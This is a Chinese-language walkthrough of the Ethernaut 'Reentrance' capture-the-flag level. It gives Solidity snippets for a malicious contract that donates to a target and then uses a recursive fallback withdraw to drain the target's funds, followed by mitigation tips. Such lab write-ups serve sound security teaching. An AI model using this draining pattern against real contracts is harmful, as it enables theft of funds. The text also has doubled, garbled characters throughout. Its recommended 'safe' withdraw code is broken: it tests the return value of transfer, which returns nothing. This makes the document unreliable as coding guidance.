什么是重入攻擊？

重入攻擊發(fā)生在單線程計算環(huán)境中，當執(zhí)行堆棧跳轉或調用子例程時，在返回到原始執(zhí)行之前。

一方面，這種單線程執(zhí)行確保了智能合約的原子性，并消除了一些競爭條件。另一方面，合約容易受到執(zhí)行順序不佳的影響。

在上面的示例中，合同B是惡意合同，遞歸地調用A.withdraw（）來耗盡合同A的資金。請注意，基金提取在合同A從其遞歸循環(huán)返回之前成功完成，甚至意識到B已經提取出超過其自身余額的方式。

此Ethernaut級別利用此重入問題以及導致DAO黑客攻擊的以下其他因素：

· 任何人都可以調用Fallback函數并執(zhí)行惡意代碼

· 惡意外部合同可能會濫用提款權

1、創(chuàng)建一個名為Reenter.sol的惡意合同，該合同將首先捐贈給Reentrance.sol，然后遞歸地從中退出，直到Reentrance耗盡資金。

contract Reenter {

Reentrance public original = Reentrance（YOUR_INSTANCE_ADDR）;

uint public amount = 1 ether; //withdrawal amount each time

}

2、Reenter.sol和以太合約結構相同

constructor（） public payable {

}

3、創(chuàng)建公共函數，以便reenter.sol可以向reentrance.sol捐款，并在其余額分類賬中注冊為捐贈者：

function donateToSelf（） public {

original.donate.value（amount）.gas（4000000）（address（this））;//need to add value to this fn

}

4、調用此函數將確保您的惡意合同至少可以調用withdraw（）一次，即通過if（balances ［msg.sender］》 = _amount）檢查。

上圖說明了Reenter.sol從Reentrance.sol中提取所有資金的遞歸循環(huán)。

讓我們在合同B中實現惡意回退功能，這樣當合同A執(zhí)行msg.sender.call.value（_amount）（）退還合同B時，您的惡意合同會觸發(fā)更多的撤銷。

5、實現此惡意回退函數：

function（） public payable {

if （address（original）.balance ！= 0 ） {

original.withdraw（amount）;

}

}

最后，在Remix中：將您的合同部署到Ropsten，為其植入以太，捐贈給Reentrance，然后調用Fallback函數，從Reentrance中耗盡所有資金。

關鍵要點：

· 執(zhí)行順序在Solidity中非常重要。如果你必須進行外部函數調用，那就做你做的最后一件事（在所有必要的檢查和余額之后）：

function withdraw（uint _amount） public {

if（balances［msg.sender］ 》= _amount） {

balances［msg.sender］ -= _amount;

if（msg.sender.transfer（_amount）（）） {

_amount;

}

}

}

// Or even better， invoke transfer in a separate function

· 包括一個互斥鎖以防止重入，例如 使用布爾鎖變量來指示執(zhí)行深度。

· 使用函數修飾符檢查不變量時要小心：修飾符在函數開頭執(zhí)行。 如果變量狀態(tài)將在整個函數期間發(fā)生變化，請考慮將修改器提取到放置在函數中正確行的檢查中。

· “使用轉移將資金從合同中轉出，因為它會拋出并限制gas轉發(fā)。 調用和發(fā)送等低級函數只返回false，但是當接收合同失敗時不會中斷執(zhí)行流程。“